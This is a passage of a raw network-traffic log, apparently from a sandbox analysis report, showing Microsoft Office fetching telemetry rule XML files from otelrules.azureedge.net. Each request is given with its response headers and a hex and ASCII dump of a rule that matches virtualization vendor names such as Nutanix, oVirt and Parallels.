                                                                                                        2024-12-09 12:49:54 UTC16384INData Raw: 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35
                                                                                                        Data Ascii: ="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L> <S T="5


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        55192.168.2.84977913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:54 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:54 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:54 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 477
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                        ETag: "0x8DC582BA54DCC28"
                                                                                                        x-ms-request-id: eb0f4028-701e-0021-6d9b-493d45000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124954Z-r1cf579d7788c742hC1EWRr97n00000002p0000000001vmb
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:54 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        56192.168.2.84978013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:54 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:54 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:54 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 419
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                        ETag: "0x8DC582BB7F164C3"
                                                                                                        x-ms-request-id: 6578e9b9-801e-00a3-294a-497cfb000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124954Z-r1cf579d778x776bhC1EWRdk8000000008ag0000000078at
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:54 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        57192.168.2.84978213.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:54 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:55 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:55 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 419
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                        ETag: "0x8DC582B9FF95F80"
                                                                                                        x-ms-request-id: a75b6259-601e-0084-3701-486b3f000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124955Z-r1cf579d778qgtz2hC1EWRmgks000000086g000000005zxz
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:55 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        58192.168.2.84978113.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:54 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:55 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:55 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 477
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                                                        x-ms-request-id: 2d987862-a01e-000d-1176-49d1ea000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124955Z-r1cf579d778mpnwnhC1EWRfgng0000000230000000006ebz
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:55 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        59192.168.2.84978313.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:54 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:55 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:55 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 472
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                        ETag: "0x8DC582BB650C2EC"
                                                                                                        x-ms-request-id: 90ee9adf-001e-0014-3106-485151000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124955Z-r1cf579d778xr2r4hC1EWRqvfs00000008f0000000003bka
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:55 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        60192.168.2.84978413.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:56 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:56 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:56 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 468
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                        ETag: "0x8DC582BB3EAF226"
                                                                                                        x-ms-request-id: 4d163ba0-f01e-0096-77c5-4910ef000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124956Z-r1cf579d7788c742hC1EWRr97n00000002kg0000000058rf
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:56 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        61192.168.2.84978513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:56 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:56 UTC491INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:56 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 485
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                        ETag: "0x8DC582BB9769355"
                                                                                                        x-ms-request-id: 8a1a8cfd-901e-007b-2cfd-49ac50000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124956Z-r1cf579d778n9656hC1EWRqns000000000r00000000046pb
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        X-Cache-Info: L1_T2
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:56 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        62192.168.2.84978613.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:56 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:57 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:57 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 411
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                        ETag: "0x8DC582B989AF051"
                                                                                                        x-ms-request-id: ea68c315-b01e-005c-4bf1-484c66000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124957Z-r1cf579d7789trgthC1EWRkkfc00000008yg000000009s81
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:57 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        63192.168.2.84978713.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:56 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:57 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:57 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 470
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                        ETag: "0x8DC582BBB181F65"
                                                                                                        x-ms-request-id: 9350bad7-201e-00aa-717e-493928000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124957Z-r1cf579d7782v2q5hC1EWRt9bw000000036g000000001x2n
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:57 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        64192.168.2.84978813.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:56 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:57 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:57 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 427
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                        ETag: "0x8DC582BB556A907"
                                                                                                        x-ms-request-id: 337dc70d-a01e-0053-5e05-488603000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124957Z-r1cf579d778qlpkrhC1EWRpfc80000000900000000006uyz
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:57 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        65192.168.2.84978913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:58 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
